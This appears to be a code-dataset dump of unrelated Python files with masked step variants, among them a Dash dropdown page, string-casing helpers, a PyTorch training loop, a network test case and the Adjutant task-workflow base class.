import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output from app import app layout = html.Div([ html.H3('Node 6'), dcc.Dropdown( id='node-6-dropdown', options=[ {'label': 'Node 6 - {}'.format(i), 'value': i} for i in [ 'NYC', 'MTL', 'LA' ] ] ), html.Div(id='node-6-display-value'), ]) @app.callback( Output('node-6-display-value', 'children'), [Input('node-6-dropdown', 'value')]) def display_value(value): return 'You have selected "{}"'.format(value)
normal
{ "blob_id": "632b90ea5a2ac35539e589af297c04b31bbf02d0", "index": 3443, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\[email protected](Output('node-6-display-value', 'children'), [Input(\n 'node-6-dropdown', 'value')])\ndef display_value(value):\n return 'You have selected \"{}\"'.format(value)\n", "step-3": "<mask token>\nlayout = html.Div([html.H3('Node 6'), dcc.Dropdown(id='node-6-dropdown',\n options=[{'label': 'Node 6 - {}'.format(i), 'value': i} for i in ['NYC',\n 'MTL', 'LA']]), html.Div(id='node-6-display-value')])\n\n\[email protected](Output('node-6-display-value', 'children'), [Input(\n 'node-6-dropdown', 'value')])\ndef display_value(value):\n return 'You have selected \"{}\"'.format(value)\n", "step-4": "import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom app import app\nlayout = html.Div([html.H3('Node 6'), dcc.Dropdown(id='node-6-dropdown',\n options=[{'label': 'Node 6 - {}'.format(i), 'value': i} for i in ['NYC',\n 'MTL', 'LA']]), html.Div(id='node-6-display-value')])\n\n\[email protected](Output('node-6-display-value', 'children'), [Input(\n 'node-6-dropdown', 'value')])\ndef display_value(value):\n return 'You have selected \"{}\"'.format(value)\n", "step-5": "import dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\n\r\nfrom app import app\r\n\r\nlayout = html.Div([\r\n html.H3('Node 6'),\r\n dcc.Dropdown(\r\n id='node-6-dropdown',\r\n options=[\r\n {'label': 'Node 6 - {}'.format(i), 'value': i} for i in [\r\n 'NYC', 'MTL', 'LA'\r\n ]\r\n ]\r\n ),\r\n html.Div(id='node-6-display-value'),\r\n\r\n])\r\n\r\n\r\[email protected](\r\n Output('node-6-display-value', 'children'),\r\n [Input('node-6-dropdown', 'value')])\r\ndef display_value(value):\r\n return 'You have selected \"{}\"'.format(value)\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
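The layout/callback module above follows Dash's multi-page app pattern, where a shared app object lives in app.py and an index script routes URLs to page layouts. A minimal routing sketch (the module name node_6 and the /node-6 path are assumptions):

import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output

from app import app
import node_6

app.layout = html.Div([
    dcc.Location(id='url', refresh=False),
    html.Div(id='page-content'),
])

@app.callback(Output('page-content', 'children'), [Input('url', 'pathname')])
def display_page(pathname):
    if pathname == '/node-6':
        return node_6.layout
    return '404'

if __name__ == '__main__':
    app.run_server(debug=True)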
valor1=input("Ingrese Primera Cantidad ") valor2=input("Ingrese Segunda Cantidad ") Total = valor1 + valor2 print "El total es: " + str(Total)
normal
{ "blob_id": "5c179752f4c4e1d693346c6edddd79211a895735", "index": 8685, "step-1": "valor1=input(\"Ingrese Primera Cantidad \")\nvalor2=input(\"Ingrese Segunda Cantidad \")\nTotal = valor1 + valor2\nprint \"El total es: \" + str(Total)\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
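The snippet above is Python 2 (print statement, eval-style input()). A Python 3 equivalent would read the values explicitly as numbers, for example:

valor1 = float(input("Enter the first amount "))
valor2 = float(input("Enter the second amount "))
total = valor1 + valor2
print("The total is: " + str(total))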
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function, with_statement """ cosi299a- Cinderella [email protected] """ def truecase_is(string): """ -> lower/title/upper/other """ if string.islower(): return 'l' if string.istitle(): return 't' if string.isupper(): return 'u' return 'o' def alnum_is(string): """ -> alpha/digit/other """ #assumption: only alnum strings analyzed if string.isalpha(): return 'a' if string.isdigit(): return 'd' return 'o' def truecase_matching_is(str1, str2): """ -> f(ull-string)/s(ub-string)/n(one) """ if str1==str2: return 'f' if str1 in str2: return 's' return 'n' def lowercase_matching_is(str1, str2): return truecase_matching_is(str1.lower(),str2.lower())
normal
{ "blob_id": "75ddcdd4e80b962198ff9de1d996837927c3ac1a", "index": 824, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\n\n<mask token>\n\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1 == str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(), str2.lower())\n", "step-3": "<mask token>\n\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\n\ndef alnum_is(string):\n \"\"\" -> alpha/digit/other \"\"\"\n if string.isalpha():\n return 'a'\n if string.isdigit():\n return 'd'\n return 'o'\n\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1 == str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(), str2.lower())\n", "step-4": "from __future__ import print_function, with_statement\n<mask token>\n\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\n\ndef alnum_is(string):\n \"\"\" -> alpha/digit/other \"\"\"\n if string.isalpha():\n return 'a'\n if string.isdigit():\n return 'd'\n return 'o'\n\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1 == str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(), str2.lower())\n", "step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom __future__ import print_function, with_statement\n\n\n\"\"\"\ncosi299a- Cinderella\[email protected]\n\"\"\"\n\ndef truecase_is(string):\n \"\"\" -> lower/title/upper/other \"\"\"\n if string.islower():\n return 'l'\n if string.istitle():\n return 't'\n if string.isupper():\n return 'u'\n return 'o'\n\ndef alnum_is(string):\n \"\"\" -> alpha/digit/other \"\"\" #assumption: only alnum strings analyzed\n if string.isalpha():\n return 'a'\n if string.isdigit():\n return 'd'\n return 'o'\n\ndef truecase_matching_is(str1, str2):\n \"\"\" -> f(ull-string)/s(ub-string)/n(one) \"\"\"\n if str1==str2:\n return 'f'\n if str1 in str2:\n return 's'\n return 'n'\n\ndef lowercase_matching_is(str1, str2):\n return truecase_matching_is(str1.lower(),str2.lower())\n", "step-ids": [ 0, 3, 4, 5, 6 ] }
[ 0, 3, 4, 5, 6 ]
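A few worked calls showing what the casing/matching helpers above return (plain assertions, runnable once the functions are in scope):

assert truecase_is('hello') == 'l'
assert truecase_is('Hello') == 't'
assert truecase_is('HELLO') == 'u'
assert truecase_is('hELLo') == 'o'
assert alnum_is('abc') == 'a' and alnum_is('123') == 'd' and alnum_is('a1') == 'o'
assert truecase_matching_is('NATO', 'NATO') == 'f'
assert truecase_matching_is('NATO', 'NATO summit') == 's'
assert lowercase_matching_is('Nato', 'NATO') == 'f'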
from .personal_questions import * from .survey_questions import *
normal
{ "blob_id": "a8f2d527e9824d3986f4bb49c3cc75fd0d999bf7", "index": 3290, "step-1": "<mask token>\n", "step-2": "from .personal_questions import *\nfrom .survey_questions import *\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/6/26 16:11
# @Author : Micky
# @Site : 
# @File : 01_压缩相关知识.py
# @Software: PyCharm

import numpy as np
from PIL import Image
from scipy import misc

if __name__ == '__main__':
    # Load the image
    image = Image.open('../datas/xiaoren.png')
    # Convert the image to a numpy array
    img = np.asarray(image)
    print(img.shape)

    # Build a new image
    imageNew = np.zeros((600,100,3))
    imageNew = imageNew.astype(np.uint8)
    misc.imsave('m.png',imageNew)
normal
{ "blob_id": "176120d4f40bc02b69d7283b7853b74adf369141", "index": 4726, "step-1": "<mask token>\n", "step-2": "<mask token>\nif __name__ == '__main__':\n image = Image.open('../datas/xiaoren.png')\n img = np.asarray(image)\n print(img.shape)\n imageNew = np.zeros((600, 100, 3))\n imageNew = imageNew.astype(np.uint8)\n misc.imsave('m.png', imageNew)\n", "step-3": "import numpy as np\nfrom PIL import Image\nfrom scipy import misc\nif __name__ == '__main__':\n image = Image.open('../datas/xiaoren.png')\n img = np.asarray(image)\n print(img.shape)\n imageNew = np.zeros((600, 100, 3))\n imageNew = imageNew.astype(np.uint8)\n misc.imsave('m.png', imageNew)\n", "step-4": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/6/26 16:11\n# @Author : Micky\n# @Site : \n# @File : 01_压缩相关知识.py\n# @Software: PyCharm\n\nimport numpy as np\nfrom PIL import Image\nfrom scipy import misc\n\nif __name__ == '__main__':\n # 图像加载\n image = Image.open('../datas/xiaoren.png')\n # 图像转换为numpy数组\n img = np.asarray(image)\n print(img.shape)\n\n # 构建一个新的图像\n imageNew = np.zeros((600,100,3))\n imageNew = imageNew.astype(np.uint8)\n misc.imsave('m.png',imageNew)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
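Note that scipy.misc.imsave was deprecated in SciPy 1.0 and removed in 1.2, so the save step above only runs on older SciPy builds. On newer stacks the same write can be done with imageio (assuming it is installed):

import imageio
import numpy as np

imageNew = np.zeros((600, 100, 3), dtype=np.uint8)
imageio.imwrite('m.png', imageNew)  # drop-in replacement for misc.imsave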
# Copyright (C) 2011 Ruckus Wireless, Inc. All rights reserved. # Please make sure the following module docstring is accurate since it will be used in report generation. """ Description: @author: Chris Wang @contact: [email protected] @since: Aug-09, 2010 Prerequisite (Assumptions about the state of the test bed/DUT): 1. Build under test is loaded on the Station Required components: 'Station' Test parameters: - zd_tag: zd tag. Will get zd components via zd tag in self.testbed.components. Test procedure: 1. Config: - initialize test parameters 2. Test: - Get limited ZD discovery settings. 3. Cleanup: - N/A Result type: PASS/FAIL Results: PASS: Get limited ZD discovery settings correctly. Messages: If FAIL the test script returns a message related to the criterion that is not satisfied """ import logging from RuckusAutoTest.models import Test from RuckusAutoTest.components.lib.zd import access_points_zd as lib class CB_ZD_Get_Primary_Secondary_ZD(Test): required_components = ['ZoneDirector'] parameters_description = {'zd_tag': "zd tag. Will get zd components via zd tag in self.testbed.components", } ''' Test case for automation. ''' def config(self, conf): self._init_test_params(conf) self._retrive_carrier_bag() def test(self): try: logging.info("Get limited ZD discovery settings via ZD") self.zd_discovery_cfg = lib.get_limited_zd_discovery_cfg(self.zd) logging.info("Limited ZD discovery cfg: %s" % self.zd_discovery_cfg) except Exception, e: self.errmsg = "Fail to get limited ZD discovery: %s" % e.message if self.errmsg: logging.debug(self.errmsg) return self.returnResult("FAIL", self.errmsg) else: self._update_carrier_bag() self.passmsg = "Get limited ZD discovery correctly: %s" % (self.zd_discovery_cfg) return self.returnResult("PASS", self.passmsg) def cleanup(self): pass def _retrive_carrier_bag(self): pass def _update_carrier_bag(self): self.carrierbag['gui_zd_discovery_cfg'] = self.zd_discovery_cfg def _init_test_params(self, conf): self.conf = dict(zd_tag = '') self.conf.update(conf) zd_tag = self.conf.pop('zd_tag') if zd_tag: self.zd = self.carrierbag[zd_tag] else: self.zd = self.testbed.components['ZoneDirector'] self.errmsg = '' self.passmsg = ''
normal
{ "blob_id": "25288a6dd0552d59f8c305bb8edbbbed5d464d5b", "index": 9997, "step-1": "# Copyright (C) 2011 Ruckus Wireless, Inc. All rights reserved.\n# Please make sure the following module docstring is accurate since it will be used in report generation.\n\n\"\"\"\n Description: \n @author: Chris Wang\n @contact: [email protected]\n @since: Aug-09, 2010\n\n Prerequisite (Assumptions about the state of the test bed/DUT):\n 1. Build under test is loaded on the Station\n\n Required components: 'Station'\n Test parameters:\n - zd_tag: zd tag. Will get zd components via zd tag in self.testbed.components.\n \n Test procedure:\n 1. Config:\n - initialize test parameters \n 2. Test:\n - Get limited ZD discovery settings.\n 3. Cleanup:\n - N/A\n \n Result type: PASS/FAIL\n Results: PASS: Get limited ZD discovery settings correctly.\n\n Messages: If FAIL the test script returns a message related to the criterion that is not satisfied\n\"\"\"\nimport logging\n\nfrom RuckusAutoTest.models import Test\nfrom RuckusAutoTest.components.lib.zd import access_points_zd as lib \n\nclass CB_ZD_Get_Primary_Secondary_ZD(Test):\n required_components = ['ZoneDirector']\n parameters_description = {'zd_tag': \"zd tag. Will get zd components via zd tag in self.testbed.components\",\n }\n \n '''\n Test case for automation.\n '''\n def config(self, conf):\n self._init_test_params(conf)\n self._retrive_carrier_bag()\n \n def test(self):\n try:\n logging.info(\"Get limited ZD discovery settings via ZD\")\n self.zd_discovery_cfg = lib.get_limited_zd_discovery_cfg(self.zd)\n logging.info(\"Limited ZD discovery cfg: %s\" % self.zd_discovery_cfg)\n except Exception, e:\n self.errmsg = \"Fail to get limited ZD discovery: %s\" % e.message\n \n if self.errmsg:\n logging.debug(self.errmsg)\n return self.returnResult(\"FAIL\", self.errmsg)\n else:\n self._update_carrier_bag()\n self.passmsg = \"Get limited ZD discovery correctly: %s\" % (self.zd_discovery_cfg)\n return self.returnResult(\"PASS\", self.passmsg)\n \n def cleanup(self):\n pass\n \n def _retrive_carrier_bag(self):\n pass\n \n def _update_carrier_bag(self):\n self.carrierbag['gui_zd_discovery_cfg'] = self.zd_discovery_cfg\n \n def _init_test_params(self, conf):\n self.conf = dict(zd_tag = '')\n self.conf.update(conf)\n \n zd_tag = self.conf.pop('zd_tag')\n if zd_tag:\n self.zd = self.carrierbag[zd_tag]\n else:\n self.zd = self.testbed.components['ZoneDirector']\n \n self.errmsg = ''\n self.passmsg = ''", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from functools import reduce import confuse config = confuse.Configuration('SleepCycleWebhooks') config.set_file('config.yaml') def get(path): return reduce(lambda view, part: view[part], path.split('.'), config).get()
normal
{ "blob_id": "16879598a8b1a0b23c5ea6de18f8fb0b0b77201c", "index": 1360, "step-1": "<mask token>\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-2": "<mask token>\nconfig.set_file('config.yaml')\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-3": "<mask token>\nconfig = confuse.Configuration('SleepCycleWebhooks')\nconfig.set_file('config.yaml')\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-4": "from functools import reduce\nimport confuse\nconfig = confuse.Configuration('SleepCycleWebhooks')\nconfig.set_file('config.yaml')\n\n\ndef get(path):\n return reduce(lambda view, part: view[part], path.split('.'), config).get()\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
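The get() helper above just walks dotted keys through confuse's view chaining, so get('webhook.url') is equivalent to config['webhook']['url'].get(). A usage sketch (the webhook.url key and the config.yaml contents are assumptions):

# config.yaml:
# webhook:
#   url: https://example.com/hook

print(get('webhook.url'))  # -> 'https://example.com/hook'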
import time import torch from torch.utils.data import DataLoader from nn_model import NNModel def train(dataset: 'Dataset', epochs: int=10): loader = DataLoader(dataset, batch_size=2, shuffle=True) model = NNModel(n_input=2, n_output=3) # model.to(device='cpu') optimizer = torch.optim.Adam(model.parameters(), lr=0.01) criterion = torch.nn.CrossEntropyLoss() start_tm = time.time() for epoch in range(1, epochs+1): train_loss = 0.0 train_acc = 0 for x, y in loader: optimizer.zero_grad() y_pred = model(x) y = torch.max(torch.squeeze(y, dim=1), dim=1).indices loss = criterion(y_pred, y) loss.backward() optimizer.step() train_loss += loss.item() train_acc += (y_pred.argmax(1) == y).sum().item() print(f'[epoch {epoch:02d}]\tloss:{train_loss}\taccuracy:{train_acc}') finish_tm = time.time() print(f'train finished.({finish_tm-start_tm}sec)')
normal
{ "blob_id": "68bcb76a9c736e21cc1f54c6343c72b11e575b5d", "index": 5093, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef train(dataset: 'Dataset', epochs: int=10):\n loader = DataLoader(dataset, batch_size=2, shuffle=True)\n model = NNModel(n_input=2, n_output=3)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n criterion = torch.nn.CrossEntropyLoss()\n start_tm = time.time()\n for epoch in range(1, epochs + 1):\n train_loss = 0.0\n train_acc = 0\n for x, y in loader:\n optimizer.zero_grad()\n y_pred = model(x)\n y = torch.max(torch.squeeze(y, dim=1), dim=1).indices\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n train_acc += (y_pred.argmax(1) == y).sum().item()\n print(f'[epoch {epoch:02d}]\\tloss:{train_loss}\\taccuracy:{train_acc}')\n finish_tm = time.time()\n print(f'train finished.({finish_tm - start_tm}sec)')\n", "step-3": "import time\nimport torch\nfrom torch.utils.data import DataLoader\nfrom nn_model import NNModel\n\n\ndef train(dataset: 'Dataset', epochs: int=10):\n loader = DataLoader(dataset, batch_size=2, shuffle=True)\n model = NNModel(n_input=2, n_output=3)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n criterion = torch.nn.CrossEntropyLoss()\n start_tm = time.time()\n for epoch in range(1, epochs + 1):\n train_loss = 0.0\n train_acc = 0\n for x, y in loader:\n optimizer.zero_grad()\n y_pred = model(x)\n y = torch.max(torch.squeeze(y, dim=1), dim=1).indices\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n train_acc += (y_pred.argmax(1) == y).sum().item()\n print(f'[epoch {epoch:02d}]\\tloss:{train_loss}\\taccuracy:{train_acc}')\n finish_tm = time.time()\n print(f'train finished.({finish_tm - start_tm}sec)')\n", "step-4": "import time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom nn_model import NNModel\n\n\ndef train(dataset: 'Dataset', epochs: int=10):\n loader = DataLoader(dataset, batch_size=2, shuffle=True)\n\n model = NNModel(n_input=2, n_output=3)\n # model.to(device='cpu')\n\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n criterion = torch.nn.CrossEntropyLoss()\n \n start_tm = time.time()\n for epoch in range(1, epochs+1):\n train_loss = 0.0\n train_acc = 0\n for x, y in loader:\n optimizer.zero_grad()\n\n y_pred = model(x)\n y = torch.max(torch.squeeze(y, dim=1), dim=1).indices\n \n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n train_acc += (y_pred.argmax(1) == y).sum().item()\n print(f'[epoch {epoch:02d}]\\tloss:{train_loss}\\taccuracy:{train_acc}')\n finish_tm = time.time()\n print(f'train finished.({finish_tm-start_tm}sec)')\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
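The training loop above expects each label row to be a one-hot vector of shape (1, 3): it squeezes dim 1 and takes the argmax before CrossEntropyLoss. A shape-compatible invocation sketch (assumes the train function and NNModel above are importable; the data is random):

import torch
from torch.utils.data import TensorDataset

x = torch.randn(10, 2)  # 10 samples, 2 features, matching n_input=2
y = torch.nn.functional.one_hot(torch.randint(0, 3, (10, 1)), num_classes=3).float()
train(TensorDataset(x, y), epochs=3)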
# Copyright (C) 2019 Catalyst Cloud Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import hashlib from logging import getLogger from confspirator import groups from confspirator import fields from adjutant import actions as adj_actions from adjutant.api.models import Task from adjutant.config import CONF from django.utils import timezone from adjutant.notifications.utils import create_notification from adjutant.tasks.v1.utils import send_stage_email, create_token, handle_task_error from adjutant import exceptions def make_task_config(task_class): config_group = groups.DynamicNameConfigGroup() config_group.register_child_config( fields.BoolConfig( "allow_auto_approve", help_text="Override if this task allows auto_approval. " "Otherwise uses task default.", default=task_class.allow_auto_approve, ) ) config_group.register_child_config( fields.ListConfig( "additional_actions", help_text="Additional actions to be run as part of the task " "after default actions.", default=task_class.additional_actions or [], ) ) config_group.register_child_config( fields.IntConfig( "token_expiry", help_text="Override for the task token expiry. " "Otherwise uses task default.", default=task_class.token_expiry, ) ) config_group.register_child_config( fields.DictConfig( "actions", help_text="Action config overrides over the action defaults. " "See 'adjutant.workflow.action_defaults'.", is_json=True, default=task_class.action_config or {}, sample_default={ "SomeCustomAction": {"some_action_setting": "<a-uuid-probably>"} }, ) ) config_group.register_child_config( fields.DictConfig( "emails", help_text="Email config overrides for this task over task defaults." "See 'adjutant.workflow.emails'.", is_json=True, default=task_class.email_config or {}, sample_default={ "initial": None, "token": { "subject": "Some custom subject", }, }, ) ) config_group.register_child_config( fields.DictConfig( "notifications", help_text="Notification config overrides for this task over task defaults." "See 'adjutant.workflow.notifications'.", is_json=True, default=task_class.notification_config or {}, sample_default={ "standard_handlers": ["EmailNotification"], "error_handlers": ["EmailNotification"], "standard_handler_config": { "EmailNotification": { "emails": ["[email protected]"], "reply": "[email protected]", } }, "error_handler_config": { "EmailNotification": { "emails": ["[email protected]"], "reply": "[email protected]", } }, }, ) ) return config_group class BaseTask(object): """ Base class for in memory task representation. This serves as the internal task logic handler, and is used to define what a task looks like. Most of the time this class shouldn't be called or used directly as the task manager is what handles the direct interaction to the logic here, and includes some wrapper logic to help deal with workflows. 
""" # required values in custom task task_type = None default_actions = None # default values to optionally override in task definition deprecated_task_types = None duplicate_policy = "cancel" send_approval_notification = True token_requires_authentication = False # config defaults for the task (used to generate default config): allow_auto_approve = True additional_actions = None token_expiry = None action_config = None email_config = None notification_config = None def __init__(self, task_model=None, task_data=None, action_data=None): self._config = None self.logger = getLogger("adjutant") if task_model: self.task = task_model self._refresh_actions() else: # raises 400 validation error action_serializer_list = self._instantiate_action_serializers(action_data) hash_key = self._create_task_hash(action_serializer_list) # raises duplicate error self._handle_duplicates(hash_key) keystone_user = task_data.get("keystone_user", {}) self.task = Task.objects.create( keystone_user=keystone_user, project_id=keystone_user.get("project_id"), task_type=self.task_type, hash_key=hash_key, ) self.task.save() # Instantiate actions with serializers self.actions = [] for i, action in enumerate(action_serializer_list): data = action["serializer"].validated_data # construct the action class self.actions.append( action["action"](data=data, task=self.task, order=i) ) self.logger.info( "(%s) - '%s' task created (%s)." % (timezone.now(), self.task_type, self.task.uuid) ) def _instantiate_action_serializers(self, action_data, use_existing_actions=False): action_serializer_list = [] if use_existing_actions: actions = self.actions else: actions = self.default_actions[:] actions += self.config.additional_actions # instantiate all action serializers and check validity valid = True for action in actions: if use_existing_actions: action_name = action.action.action_name else: action_name = action action_class = adj_actions.ACTION_CLASSES[action_name] if use_existing_actions: action_class = action # instantiate serializer class if not action_class.serializer: raise exceptions.SerializerMissingException( "No serializer defined for action %s" % action_name ) serializer = action_class.serializer(data=action_data) action_serializer_list.append( {"name": action_name, "action": action_class, "serializer": serializer} ) if serializer and not serializer.is_valid(): valid = False if not valid: errors = {} for action in action_serializer_list: if action["serializer"]: errors.update(action["serializer"].errors) raise exceptions.TaskSerializersInvalid(errors) return action_serializer_list def _create_task_hash(self, action_list): hashable_list = [ self.task_type, ] for action in action_list: hashable_list.append(action["name"]) if not action["serializer"]: continue # iterate like this to maintain consistent order for hash fields = sorted(action["serializer"].validated_data.keys()) for field in fields: try: hashable_list.append(action["serializer"].validated_data[field]) except KeyError: if field == "username" and CONF.identity.username_is_email: continue else: raise return hashlib.sha256(str(hashable_list).encode("utf-8")).hexdigest() def _handle_duplicates(self, hash_key): duplicate_tasks = Task.objects.filter( hash_key=hash_key, completed=0, cancelled=0 ) if not duplicate_tasks: return if self.duplicate_policy == "cancel": now = timezone.now() self.logger.info("(%s) - Task is a duplicate - Cancelling old tasks." % now) for task in duplicate_tasks: task.add_task_note( "Task cancelled because was an old duplicate. 
- (%s)" % now ) task.get_task().cancel() return raise exceptions.TaskDuplicateFound() def _refresh_actions(self): self.actions = [a.get_action() for a in self.task.actions] def _create_token(self): self.clear_tokens() token_expiry = self.config.token_expiry or self.token_expiry token = create_token(self.task, token_expiry) self.add_note("Token created for task.") try: # will throw a key error if the token template has not # been specified email_conf = self.config.emails.token send_stage_email(self.task, email_conf, token) except KeyError as e: handle_task_error(e, self.task, error_text="while sending token") def add_note(self, note): """ Logs the note, and also adds it to the task notes. """ now = timezone.now() self.logger.info( "(%s)(%s)(%s) - %s" % (now, self.task_type, self.task.uuid, note) ) note = "%s - (%s)" % (note, now) self.task.add_task_note(note) @property def config(self): """Get my config. Returns a dict of the config for this task. """ if self._config is None: try: task_conf = CONF.workflow.tasks[self.task_type] except KeyError: task_conf = {} self._config = CONF.workflow.task_defaults.overlay(task_conf) return self._config def is_valid(self, internal_message=None): self._refresh_actions() valid = all([act.valid for act in self.actions]) if not valid: # TODO(amelia): get action invalidation reasons and raise those raise exceptions.TaskActionsInvalid( self.task, "actions invalid", internal_message ) @property def approved(self): return self.task.approved @property def completed(self): return self.task.completed @property def cancelled(self): return self.task.cancelled def confirm_state(self, approved=None, completed=None, cancelled=None): """Check that the Task is in a given state. None value means state is ignored. Otherwise expects true or false. """ if completed is not None: if self.task.completed and not completed: raise exceptions.TaskStateInvalid( self.task, "This task has already been completed." ) if not self.task.completed and completed: raise exceptions.TaskStateInvalid( self.task, "This task hasn't been completed." ) if cancelled is not None: if self.task.cancelled and not cancelled: raise exceptions.TaskStateInvalid( self.task, "This task has been cancelled." ) if not self.task.cancelled and cancelled: raise exceptions.TaskStateInvalid( self.task, "This task has not been cancelled." ) if approved is not None: if self.task.approved and not approved: raise exceptions.TaskStateInvalid( self.task, "This task has already been approved." ) if not self.task.approved and approved: raise exceptions.TaskStateInvalid( self.task, "This task has not been approved." ) def update(self, action_data): self.confirm_state(approved=False, completed=False, cancelled=False) action_serializer_list = self._instantiate_action_serializers( action_data, use_existing_actions=True ) hash_key = self._create_task_hash(action_serializer_list) self._handle_duplicates(hash_key) for action in action_serializer_list: data = action["serializer"].validated_data action["action"].action.action_data = data action["action"].action.save() self._refresh_actions() self.prepare() def prepare(self): """Run the prepare stage for all the actions. If the task can be auto approved, this will also run the approve stage. 
""" self.confirm_state(approved=False, completed=False, cancelled=False) for action in self.actions: try: action.prepare() except Exception as e: handle_task_error(e, self.task, error_text="while setting up task") # send initial confirmation email: email_conf = self.config.emails.initial send_stage_email(self.task, email_conf) approve_list = [act.auto_approve for act in self.actions] # TODO(amelia): It would be nice to explicitly test this, however # currently we don't have the right combinations of # actions to allow for it. if False in approve_list: can_auto_approve = False elif True in approve_list: can_auto_approve = True else: can_auto_approve = False if self.config.allow_auto_approve is not None: allow_auto_approve = self.config.allow_auto_approve else: allow_auto_approve = self.allow_auto_approve if can_auto_approve and not allow_auto_approve: self.add_note("Actions allow auto aproval, but task does not.") elif can_auto_approve: self.add_note("Action allow auto approval. Auto approving.") self.approve() return if self.send_approval_notification: notes = {"notes": ["'%s' task needs approval." % self.task_type]} create_notification(self.task, notes) def approve(self, approved_by="system"): """Run the approve stage for all the actions.""" self.confirm_state(completed=False, cancelled=False) self.is_valid("task invalid before approval") # We approve the task before running actions, # that way if something goes wrong we know if it was approved, # when it was approved, and who approved it. self.task.approved = True self.task.approved_on = timezone.now() self.task.approved_by = approved_by self.task.save() # approve all actions for action in self.actions: try: action.approve() except Exception as e: handle_task_error(e, self.task, error_text="while approving task") self.is_valid("task invalid after approval") need_token = any([act.need_token for act in self.actions]) if need_token: self._create_token() else: self.submit() def reissue_token(self): self.confirm_state(approved=True, completed=False, cancelled=False) need_token = any([act.need_token for act in self.actions]) if need_token: self._create_token() def clear_tokens(self): for token in self.task.tokens: token.delete() def submit(self, token_data=None, keystone_user=None): self.confirm_state(approved=True, completed=False, cancelled=False) required_fields = set() actions = [] for action in self.task.actions: a = action.get_action() actions.append(a) for field in a.token_fields: required_fields.add(field) if not token_data: token_data = {} errors = {} data = {} for field in required_fields: try: data[field] = token_data[field] except KeyError: errors[field] = [ "This field is required.", ] except TypeError: errors = ["Improperly formated json. " "Should be a key-value object."] break if errors: raise exceptions.TaskTokenSerializersInvalid(self.task, errors) self.is_valid("task invalid before submit") for action in actions: try: action.submit(data, keystone_user) except Exception as e: handle_task_error(e, self.task, "while submiting task") self.is_valid("task invalid after submit") self.task.completed = True self.task.completed_on = timezone.now() self.task.save() for token in self.task.tokens: token.delete() # Sending confirmation email: email_conf = self.config.emails.completed send_stage_email(self.task, email_conf) def cancel(self): self.confirm_state(completed=False, cancelled=False) self.clear_tokens() self.task.cancelled = True self.task.save()
normal
